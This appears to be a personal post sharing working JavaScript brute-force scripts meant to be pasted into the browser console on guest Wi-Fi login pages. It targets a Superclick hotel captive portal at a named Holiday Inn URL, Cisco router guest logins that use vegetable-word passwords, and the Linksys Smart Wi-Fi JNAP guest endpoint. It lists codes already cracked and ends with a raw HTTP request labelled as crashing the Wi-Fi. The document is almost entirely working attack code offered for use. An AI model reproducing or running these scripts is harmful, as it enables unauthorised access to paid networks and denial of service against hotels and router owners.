Some hotel wifi networks are open, but require you to authenticate with an easily crackable password, so here's a way to bypass that. Made it back in early 2017. For multiple different hotels.
var code = 1000, x, i = 0, concurrent_requests = 0;
//Hotel wifi password cracker(Superclick)
function CrackHotelWifiPassword()
{
if (code == 10000)
clearInterval(x);
if (concurrent_requests >= 20)
return; //max 20 req running at a time
concurrent_requests++;
var xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", "/superclick/wifi_accept.php");
xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xmlhttp.code = code;
xmlhttp.onreadystatechange = function() {
if (this.readyState === this.DONE) {
concurrent_requests--;
var loc = this.responseURL;//this.getResponseHeader("Location");
console.log(loc);
if (loc.indexOf("errcode=1") !== -1){ //otherwise it's empty because: http://prntscr.com/elmb70
//console.log('Invalid code: ' + this.code);
}
else{
console.log('Valid code: ' + this.code);
//clearInterval(x);
}
}
}
xmlhttp.send("yesval=yes&noval=no&button=yes&password=" + (code++));
}
x = setInterval(CrackHotelWifiPassword, 250);
//note: must be executed when on https://p2593.superclick.com/std/holiday_inn_new/login_wifi_pin.php?group=4&roomid=1&lang=en&deflang=en&preview=
results:
/*
1005
, 1113, 1170, 1233, 1303, 1329, 1450, 1534, 1766, 1793, 1895, 2159,
*/
2.
//------------------------------------------------------------------------------------------------
//for: (product=Cisco Router, notes=for the ones with only the password field)
var index = 0, code = 0, concurrent_requests = 0;
var sec_prefixes = ["cucumber", "lettuce", "kiwi", "olive", "potato", "tomato", "onion", "cabbage", "carrot", "eggplant", "radish", "garlic", "turnip", "maize", "broccoli", "spinach", "celery", "scallion", "zucchini", "artichoke"];
var x = setInterval(function(){
if (concurrent_requests >= 40)
return; //max 40 req running at a time
if (code == 100){
code = 0;
index++;
}
if (index == sec_prefixes.length){
clearInterval(x);
return;
}
concurrent_requests++;
id = sec_prefixes[index] + ("00" + code++).slice(-2);
var xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", "/guestnetwork.cgi");
xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xmlhttp.code = id;
xmlhttp.onreadystatechange = function() {
if (this.readyState === this.DONE) {
concurrent_requests--;
if (this.responseText.indexOf("var deny='1'") === -1){
console.log("Found PWD: " + this.responseURL + " - " + this.pwd);
clearInterval(x);
}
else
console.log('Incorrect PWD: ' + this.pwd);
}
}
xmlhttp.send("submit_button=login&change_action=&action=Apply&wait_time=0&submit_type=&gn_host_url=google.com&gn_view_type=0&guest_login=" + encodeURIComponent(id));
}, 10);
3
//---------------------------------------------------------------------------------------
//LINKSYS Smart Wi-Fi guest password cracker
var code = 1, concurrent_requests = 0;
x = setInterval(function()
{
if (code == 10000)
clearInterval(x);
if (concurrent_requests >= 20)
return; //max 20 req running at a time
concurrent_requests++;
var xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", "/JNAP/");
xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xmlhttp.setRequestHeader('X-JNAP-Action', 'http://cisco.com/jnap/guestnetwork/Authenticate');
xmlhttp.setRequestHeader('X-JNAP-Authorization', 'undefined');
xmlhttp.code = code;
xmlhttp.onreadystatechange = function() {
if (this.readyState === this.DONE) {
concurrent_requests--;
var loc = this.responseURL;//this.getResponseHeader("Location");
if (loc.indexOf('"result": "ErrorInvalidPassword"') !== -1){ //otherwise it's empty because:
console.log('Valid code: ' + this.code);
}
}
}
xmlhttp.send('{"macAddress":"d0:53:49:3e:90:ed","ipAddress":"192.168.3.125","password":"'+ (code++) +'"}');
}, 10);
crash the wifi:
POST http://192.168.3.1:10080/JNAP/ HTTP/1.1
Host: 192.168.3.1:10080
Connection: keep-alive
Content-Length: 52
X-JNAP-Action: http://cisco.com/jnap/guestnetwork/Authenticate
X-JNAP-Authorization: undefined
Origin: http://192.168.3.1:10080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36
Content-Type: application/json; charset=UTF-8
Accept: */*
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Expires: Sun Mar 19 2017 17:51:19 GMT-0500 (Central Daylight Time)
DNT: 1
Referer: http://192.168.3.1:10080/ui/dynamic/guest-login.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
{"macAddress":"","ipAddress":null,"password":"1234"}